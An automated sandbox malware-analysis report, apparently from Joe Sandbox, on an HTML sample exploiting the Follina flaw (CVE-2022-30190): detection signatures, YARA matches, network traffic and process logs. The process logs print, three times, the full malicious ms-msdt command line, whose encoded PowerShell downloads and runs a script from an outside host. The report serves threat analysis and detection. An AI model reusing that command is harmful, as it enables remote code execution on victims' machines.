Windows Analysis Report
1.html

Overview

General Information

Sample Name: 1.html
Analysis ID: 638689
MD5: ea483ab89d8b9baf00b953f0636e0520
SHA1: b0b952334f0d0195b06faed532170263f7fad6c2
SHA256: 5385a798d136365b644199359dc2662de3b0d6c5adc09e4cf9cada074e8a9338
Tags: Follinahtml
Infos:

Detection

Follina CVE-2022-30190
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: 1.html Virustotal: Detection: 32% Perma Link

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: 1.html, type: SAMPLE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txt Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\ Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json Jump to behavior
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C898C3 FindFirstFileExW, 27_2_00C898C3
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: Ruleset Data.0.dr String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ChromeRecovery.exe.26.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://ocsp.digicert.com0
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 176bd4d4-b466-471c-b2dc-78592e59bf93.tmp.1.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://dns.google
Source: LICENSE.txt.0.dr String found in binary or memory: https://easylist.to/)
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://play.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr String found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: global traffic HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Contains functionality for read data from the clipboard
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C79029 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard, 27_2_00C79029
Yara signature match
Source: 1.html, type: SAMPLE Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: 0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 5808, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Detected potential crypto function
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8C8DF 27_2_00C8C8DF
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C951B0 27_2_00C951B0
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C87AF1 27_2_00C87AF1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C9328B 27_2_00C9328B
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C802A1 27_2_00C802A1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C94A67 27_2_00C94A67
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C9423B 27_2_00C9423B
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C944E5 27_2_00C944E5
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8F428 27_2_00C8F428
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C93EC9 27_2_00C93EC9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C956B9 27_2_00C956B9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C87E39 27_2_00C87E39
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C947AC 27_2_00C947AC
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8EFA0 27_2_00C8EFA0
Found potential string decryption / allocating functions
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: String function: 00C7FE60 appears 43 times
Contains functionality to communicate with device drivers
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C79D31: CreateFileW,DeviceIoControl,CloseHandle, 27_2_00C79D31
PE file contains strange resources
Source: ChromeRecovery.exe.26.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ChromeRecovery.exe.26.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1.html Virustotal: Detection: 32%
Source: C:\Windows\System32\msdt.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Process created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
